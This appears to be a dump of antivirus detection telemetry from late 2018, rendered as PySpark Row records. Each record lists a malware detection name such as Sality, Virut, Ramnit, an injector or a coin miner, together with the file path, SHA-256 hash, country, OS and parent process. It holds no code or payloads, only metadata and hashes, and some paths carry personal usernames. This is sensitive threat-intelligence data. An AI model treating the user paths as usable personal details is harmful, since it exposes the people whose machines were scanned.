  Row(detection=Row(filename='avscan-20181102-060128-b5bd0455', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060128-B5BD0455', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054856-f57c0f15', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054856-F57C0F15', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053347-d723e849', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053347-D723E849', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054422-51c72c9c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054422-51C72C9C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060636-6d068a57', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060636-6D068A57', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055922-6a7c5c48', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055922-6A7C5C48', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051437-29c31089', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051437-29C31089', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062256-b53d2dd1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062256-B53D2DD1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054848-f07594a3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054848-F07594A3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050807-4183e02e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050807-4183E02E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054846-ef4d031d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054846-EF4D031D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051722-8c34d838', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051722-8C34D838', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060932-d5c24812', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060932-D5C24812', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050637-0c0e8236', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050637-0C0E8236', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054458-67913c53', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054458-67913C53', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053803-702c7a2a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053803-702C7A2A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T14:55:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062658-456b0bee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062658-456B0BEE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='training rpg.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\RPG\\PROPOSAL TRAINING RPG\\TRAINING RPG.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:23:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp8034363\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:12:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='25479f7609ca14a234a8a6af4dcfb50d91b203ba239d928aa677cb57bd8424be', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-20.categorizing\\25479F7609CA14A234A8A6AF4DCFB50D91B203BA239D928AA677CB57BD8424BE', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='25479f7609ca14a234a8a6af4dcfb50d91b203ba239d928aa677cb57bd8424be', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T09:43:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwh923a', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWH923A', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:32:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155611-c3a46ddf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155611-C3A46DDF', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:56:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gcaclientdll.dll', filepath='D:\\Garena Plus\\Room\\gcaclientdll.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='4ab7f3881951699503ec3d0c4a6c245469963cc591ea704d75fce1ec3a564c9e', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1378648, timestamp='2018-11-01T05:44:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T03:20:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-085438-f367b67e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8de92a44\\AVSCAN-20181101-085421-F0FC28BE\\AVSCAN-20181101-085438-F367B67E', filesize=576000, name='TR/Miner.syyzh.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:54:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\aswidsagent.exe', parentsize=6800144, timestamp='2018-11-01T12:08:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155804-d696d1b6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155804-D696D1B6', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:58:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-00-47-50.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-26T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T06:57:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='1d563aca47ba0cb20387b3d8ccb65eda25a431b4b466711f0ee07f42f6785a79', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T06:13:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151958-13cb2eec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-151340-DF30F2CA\\AVSCAN-20181101-151958-13CB2EEC', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:38:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered telet', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered telet', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='22b8fc26575cc8be0f9e6b0c8e672c5835aadc11a06990d6d111d9535096d5f9', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:49:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7465884\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T20:32:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='TR/Patched.Gen.#M300.#R2947'), hash='0de2186f822b93d071a20fe2c6b0ab283b0d6c90f1c280e34ab915fca0cb8028', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T09:24:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T17:43:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwh3b08', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWH3B08', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:41:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwh8d7b.exe', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWH8D7B.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:40:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-14-12-07.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-27T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T13:22:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-210517-1af7be75', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_579e1550\\AVSCAN-20181031-210339-10A15C0C\\AVSCAN-20181031-210517-1AF7BE75', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T00:05:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-105828-9bf8bd0c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-105828-9BF8BD0C', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T16:58:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='nmworker.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\.micro_miner\\resources\\nvidia\\18\\nmworker.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Micro Miner\\MicroMiner.exe', parentsize=578048, timestamp='2018-11-01T15:34:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111816-31cd0a7d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111816-31CD0A7D', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:18:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T16:02:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='em000_32.dll', filepath='D:\\Archivos de programa\\ESET\\ESET Security\\Modules\\em000_32\\1029\\em000_32.dll', filesize=112000, name='TR/Crypt.XPACK.Gen.#M300.#R3761'), hash='95391fab785fadc038740c59bcb8c8e03216702ae5459f4793d2b0d83906ce78', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:48:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='özel dosyalar.exe', filepath='G:\\Özel Dosyalar.exe', filesize=2496000, name='TR/Dropper.Gen.#M300.#R616'), hash='afa0bb04a5f6fd8a1f696508e646b4ff3f97d655537358d74484afcad341106d', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T14:39:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='ebdd3149efb3fc16bfbd92f38efa812fcc3c9b32aac0702e4472c25868ae0757', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T05:45:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='999577e42d9d2224fc8665043a6dc2a2aa7711221fe449ca1d3db123709219b1', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_17.10.2018-22.available\\Avira\\999577E42D9D2224FC8665043A6DC2A2AA7711221FE449CA1D3DB123709219B1', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='999577e42d9d2224fc8665043a6dc2a2aa7711221fe449ca1d3db123709219b1', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T11:18:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ae67b4a8b22a16dca7743719faaed52e4cbcb3ee8143ebeaaa1591074c267a89', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-17\\AE67B4A8B22A16DCA7743719FAAED52E4CBCB3EE8143EBEAAA1591074C267A89', filesize=1856000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='ae67b4a8b22a16dca7743719faaed52e4cbcb3ee8143ebeaaa1591074c267a89', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:17:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='birdieshoot.exe', filepath='\\?\\J:\\العاب2\\Birdie Shoot\\BirdieShoot.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='a9c9f3f59cc36eb7bac604c729abd072e27eaba084b7195cc5033eaecf76c67f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:05:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dx81bredist.exe', filepath='i:\\new folder\\adata ufd\\drive\\pess 6\\dx8.1b redist\\license\\dx81bredist.exe', filesize=25852000, name='W32/Sality.AT.#M1.#R1'), hash='72a170608734f1aebda7a5e25b7356d90967a3c192517395c2bbefb63c2cb476', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:57:36Z'), dt=datetime.date(2018, 11, 1)),
